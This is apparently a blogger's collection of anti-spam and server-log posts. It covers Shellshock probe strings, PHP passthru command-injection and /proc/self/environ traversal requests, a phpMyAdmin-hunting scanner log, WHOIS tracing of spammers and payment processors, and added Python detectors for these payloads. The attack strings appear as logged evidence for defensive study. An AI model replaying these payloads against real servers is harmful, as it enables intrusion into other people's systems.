“() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;”

I wonder a little bit about these two hits in the log from a website:

Fri, 3 Oct 02:46    95.211.131.148    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;
Fri, 3 Oct 11:32    209.11.159.26    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;

Something about bash maybe?

209.11.159.26:

Quality Technology Services Santa Clara, LLC QTS-209-11-128-0-18 (NET-209-11-128-0-1) 209.11.128.0 - 209.11.191.255
IBIS Inc. QTS-209-11-159-0-24 (NET-209-11-159-0-1) 209.11.159.0 - 209.11.159.255

95.211.131.148 is LeaseWeb, which used to be a shitty place.
Still is, obviously.
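The logged value starts with `() {`, the prefix bash uses to import a function from an environment variable, so these hits are probes for the bash function-import bug publicly known as Shellshock. The following detector is an added example, not part of the original post: it flags such rows and works out the canary string a vulnerable host would have echoed back. The row layout (fields separated by two or more spaces) and the two benign rows are assumptions.

```python
import re

# The first two rows are the hits quoted in the post; the last two are constructed benign rows.
ROWS = [
    "Fri, 3 Oct 02:46    95.211.131.148    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;",
    "Fri, 3 Oct 11:32    209.11.159.26    () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;",
    "Fri, 3 Oct 11:40    192.0.2.10    Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0",
    "Fri, 3 Oct 11:41    198.51.100.7    curl/7.38.0 (){ not at start }",
]

# bash treats an environment value as a function definition when it begins with "() {".
# Whitespace variants are matched as well so near-misses still get logged.
FUNC_IMPORT = re.compile(r"^\s*\(\)\s*\{")
# Everything after the function body's closing brace is what an unpatched bash would run.
TRAILER = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;?\s*(.*)$", re.S)
# Canary arithmetic such as M`expr 1330 + 7`H: literal, backticked sum, literal.
CANARY = re.compile(r"(\w*)`expr\s+(\d+)\s*\+\s*(\d+)`(\w*)")


def parse_row(row):
    """Split a row into (when, ip, header_value); assumes 2+ spaces between fields."""
    parts = re.split(r"\s{2,}", row.strip(), maxsplit=2)
    return tuple(parts) if len(parts) == 3 else None


def trailing_command(value):
    """Return the text that follows the dummy function body, or '' if there is none."""
    m = TRAILER.match(value)
    return m.group(1).strip() if m else ""


def expected_canary(command):
    """String a vulnerable host would have sent back, or None if no arithmetic canary."""
    m = CANARY.search(command)
    if not m:
        return None
    return f"{m.group(1)}{int(m.group(2)) + int(m.group(3))}{m.group(4)}"


def scan(rows):
    """Return one record per row whose header value starts like a bash function import."""
    hits = []
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        when, ip, value = parsed
        if FUNC_IMPORT.match(value):
            cmd = trailing_command(value)
            hits.append({"when": when, "ip": ip, "command": cmd,
                         "canary": expected_canary(cmd)})
    return hits


if __name__ == "__main__":
    for hit in scan(ROWS):
        print(f'{hit["ip"]:<16} {hit["when"]}  canary={hit["canary"]}')
```

A hit only shows that someone tried; whether the host ran the command shows in the response it sent, where the canary would appear in the body.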


William Stanley is apparently back

If he ever went away, that is.

I’ve seen spam to several of the domains I have registered.
All to the address info@domain.tld.
I wonder if Google is happy about the from address “no-reply at gmail” being used.

Something along these lines in common:

From: “You Need Reviews” <No-reply[atdomain]gmail.com
Subject: Got Bad Reviews? Need good Reviews?
To: “info”<info@domain.tld>

We Post Good Reviews.
We do Reputation Repair.
We do Blog Advertising.

We can help you defend your company by posting positive Reviews, Blogs and creating Websites
to take over Search Results and control what people see about your company.

361-444-3559

http://www.ReviewShowcase. com for Paid Review Posting Service
http://www.ReviewShowcase. com for Reviews and Reputation Service

How does posting positive reviews help in your businesses Google ranking?

1. Positive reviews increase your business rank by linking important and relevant websites to your website.
2. A constant stream of positive reviews improves your online reputation.
3. Positive reviews drive traffic to your business.
4. Positive reviews restore a tarnished reputation by pushing down negative reviews and links.
5. Helps protect against competitors or anyone else from attempting to run your ranking.

361-444-3559 ReputationRewards@gmail.com

He also falsifies headers by trying to spoof yahoo.com as the sender.

Email addresses used:
myprogramskills@gmail.com
postingshowcase@gmail.com

Short info from the domain registration:

Domain Name: REVIEWSHOWCASE.COM
Registrar: MONIKER

Registrant [1426977]:
        William Laurence reliablechat@gmail.com
        2120 hwy 361
        port aransas
        TX
        78373
        US

In late April reviewshowcase.com was hosted at 207.189.109.125, ViaWest.
Now it lives at 103.11.189.31, something called VERTICAL ENTERPRISE LLP in Singapore.

As usual there are quite a lot of domains involved, a few of them (some are most likely already dead):

  • bestreviewservice.com
  • blametaker.com
  • cdrplacementgroup.com
  • crushyourcompetition.com
  • complaintcontrol.com
  • deluxereputation.com
  • findfaxnumbers.com
  • freespeechhost.com
  • postgoodreviews.com
  • postingpositivereviews.com
  • postingshowcase.com
  • programskills.com
  • referenceguy.com
  • reputationmoniker.com
  • reputationpromo.com
  • reputationtracker.info
  • supportgator.com
  • yourbestreputation.com
  • youneedreviews.com

And one not fitting the pattern above, but rather more along the Russian bride scamming business:
safebride.com – seems to be gone.

Another one is acewigsblog.com, which also seems to be gone.
But why not get into the business of wigs? He has tried a lot before, like diapers.

I wonder how he managed to get out of Spamhaus’ ROKSO list.
Or, maybe more correctly: why he isn’t back on ROKSO.


The dark past of Gateline / Onelya

Brian Krebs has written an excellent article on his blog, krebsonsecurity.com:
“Gateline.net Was Key Rogue Pharma Processor”

It’s an article in a series about the “Pharma War” between two Russian spammers, Pavel Vrublevsky and Igor Gusev.
The focus in his latest article is, as the title says, the payment processor for both, Gateline.net and the people involved.

I’ll float on Krebs’ research, add some relatively old stuff and compare that with existing info from today about Gateline. Which will show their ugly past.
And maybe what their business is today, who knows? I don’t.

I’ll also make attempts to identify a couple of guys in his article.

But it has to be later, I am seriously hit by what I think is called “writer’s block”.

April 23, 2012

Building bit by bit, a little addition today.
I don’t know when or if more will come.

I checked a few pieces of information based on Krebs’ article.
One little piece is relatively easy to have a look at, the information in the domain registration for gateline.net as of today:

Administrative Contact, Technical Contact:
      France, Kellee		adm@onelya.ru
      Onelya Ltd.
      21-1 Novy Arbat
      Moscow 119019
      RU
      +7 495 3630953

The domain was created 01-may-2002.
Please note a couple of details:
“France, Kellee” and “21-1 Novy Arbat”

My nose wings started vibrating, but I could not put my finger on exactly why.
A few quick searches and I found a few small pieces of info, about 10 years old.

Now let’s compare today’s info about Gateline and Onelya to what made my nose wings go crazy.
This is the registration info for a couple of other domains, ufs-online.org and paymentway.net, as it was shown in November 2002.
First ufs-online.org:

Registrant:
 GARDINER INDUSTRIES INC.
 12260 Willow Grove Road Bldg. #2
 Camden, DE 19934
 US

 Domain Name: UFS-ONLINE.ORG

 Administrative Contact:
    Kellee, France  admin@ufs-online.co.uk
    12260 Willow Grove Road Bldg. #2
    Camden, DE 19934
    US
    +1 917 523-44-79

 Technical Contact:
    Labor, Alex  a1582_l@hotmail.com
    Ministeer 48/2
    Sverdlovsk, SR 113326
    RU
    +73432 126718
    Fax: +73432 126718

And a shorter version of the registration info for paymentway.net:

Registrant:
France, Kellee (HNWKZNXJHD)
   12260 Willow Grove Road Bldg. #2
   Camden, DE 19934
   US

   Domain Name: PAYMENTWAY.NET

   Administrative Contact:
      France, Kellee  (COHLMRHLXI)		admin@paymentway.net
      
      12260 Willow Grove Road Bldg. #2
      Camden, DE  19934
      US
      123654987 123 123 1234

We again have the same name as in the info for gateline.net, “France, Kellee”.
The email address for the “technical contact” is also somewhat interesting, I may come back to that later.

So what about the domains “ufs-online.org” and “paymentway.net”?
What were they used for?
Like Gateline in 2012, ufs-online.org and paymentway.net were also part of a payment process back in 2002.

But not for spammers selling illegal drugs.
No, it was for spammers and criminals abusing little girls.

A quote from one of those sites back in 2002:

“ELITE UNDERAGE ARCHIVE” – Huge Collection.

These kinds of sites were often organized with “portal” sites, which in turn served links on to sites where pictures and/or movies of sexually abused children were sold.

Now back to “ufs-online.org” and let’s have a look at another little pesky detail about the domain:

ufs-online.org 1 SOA
server: ns1.ufs-online.org
email: aw@cardbilling.net

Note: email: aw@cardbilling.net

To be continued (when I get around to doing so)


Oh, really?

This is a bit funny:

remarks:         This is Ideal-Solution and 2x4.ru Hosting IP network
[snip]
remarks:         ***************************************
remarks:         note for spamhause company of usa:
remarks:         stop follow this subnet, nothing bad here, you can contact us if need.
remarks:         ***************************************

I wonder if “spamhause company of usa” actually is meant to be spamhaus.org.
Everybody knows that Steve Linford is floating around in a houseboat somewhere in Britain, don’t we?
Well, we are perhaps almost equal in knowledge there, the Russians and myself, regarding geography and the whereabouts of Spamhaus.
But I feel reasonably sure that they are not in the US.

And I also know that the netblock 193.107.16.0/22, “Ideal Solution Ltd”, mounted by WebAlta, has a history of exploits, trojans and whatever bad stuff you can imagine on the net. And 2x4.ru? Not exactly angels.

At least they are better at hosting criminal activity than in geography.
Always good to feel you master something, whatever it is.


58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” during a few seconds.
This one was a bit more “intense” than usual, +1100 lines in the log and it lasted for +13 minutes.
Coming from the IP 58.63.241.209 (China), looking for weaknesses to exploit, “proc/self/environ%00”.

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines are below; see the attached .txt-file (.txt is now allowed?) .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.
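The requests above carry their payloads percent-encoded, so a plain-text search of the raw log can miss them. The following classifier is an added example, not part of the original post: it decodes each query parameter (repeatedly, to catch double encoding) and tags traversal to /proc/self/environ, null-byte terminators and PHP command-execution calls. The tag names, the list of PHP functions and the last two sample lines are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The first four lines are copied from the excerpt in the post. The fifth (double-encoded)
# and sixth (benign) lines are constructed for this example.
LOG = """\
[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:05 -0500] "GET /index.php?page=..%252f..%252fproc%252fself%252fenviron%2500
[29/Dec/2011:04:07:10 -0500] "GET /gallery/main.php?cmd=view&item=42
"""

LINE = re.compile(r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>[A-Z]+)\s+(?P<target>\S+)')
PHP_EXEC = re.compile(r"\b(passthru|system|shell_exec|exec|popen|proc_open)\s*\(", re.I)
TRAVERSAL = re.compile(r"(?:\.\./){2,}")


def full_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are classified too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the list of tags that apply to one decoded parameter value."""
    tags = []
    if TRAVERSAL.search(value):
        tags.append("traversal")
    if "proc/self/environ" in value:
        tags.append("proc-environ")
    if "\x00" in value:
        tags.append("null-byte")
    if PHP_EXEC.search(value):
        tags.append("php-exec")
    return tags


def analyse(log_text):
    """Return one finding per suspicious query parameter: script path, parameter, tags."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            tags = classify(full_decode(raw))
            if tags:
                findings.append({"ts": m.group("ts"), "path": path,
                                 "param": unquote(name), "tags": tags})
    return findings


def summary(findings):
    """Count how often each tag occurs across all findings."""
    return Counter(tag for f in findings for tag in f["tags"])


if __name__ == "__main__":
    for f in analyse(LOG):
        print(f'{f["path"]:<32} {f["param"]:<26} {",".join(f["tags"])}')
```

The parameter column shows which application each request was aimed at, which is how a name such as mosConfig_absolute_path stands out in the output.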


carder.cc – Phoenix rising from the ashes?

Got this one a couple of days ago.
Interesting?
I don’t know.
October is here and there is not much time left.
If anybody else is interested …

carder.cc seems to be live at 85.17.81.165, Leaseweb. No surprise there, rotten place.

Good day, dear forum member CARDER.CC

After a three-year break our forum resumes. Since you have received this message, it means you’re one of those whose account is not deleted on the forum. Let’s hope – not in vain.

All the principles of access to the forum will be seriously reconsidered. Will be introduced the hard surety and financial liability. Forum is fully enclosed and paid as Only then can we ensure that the work on it only those who really need a forum, not a place for quality kidka.

As always – welcome professionals in their field, both for the moderation of the relevant sections and to provide quality services.

This offer is valid only until October 1, 2011. If you are not logged in to the forum before that time, your account will be blocked. Sorry, but this is a security policy.

If you are satisfied with the new conditions – are waiting for you. If not – good luck in your business.

Sincerely, S-tamps


Gootkit auto-rooter scanner – hello

First time I have seen something identify as “Gootkit auto-rooter scanner”.
As a side note, this is also an example of why I prefer to block AfriNIC.
Too much rotten stuff coming from that space.

All these came via 41.129.63.65:

 [21/Sep/2011:09:28:13 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /PHPMYADMIN/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /mysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/setup.php HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /~/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /admin/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /administrator/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /administrator/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/sysadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /bbs/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmindb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelmysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelsql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpdbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/db-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /db/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /~/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /MyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladminconfig/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /~/phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /~/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmy/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmya/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /php-my-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin1/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phppma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /p/m/a/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /program/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /qql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /roundcube/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /sl2/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /SQL/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
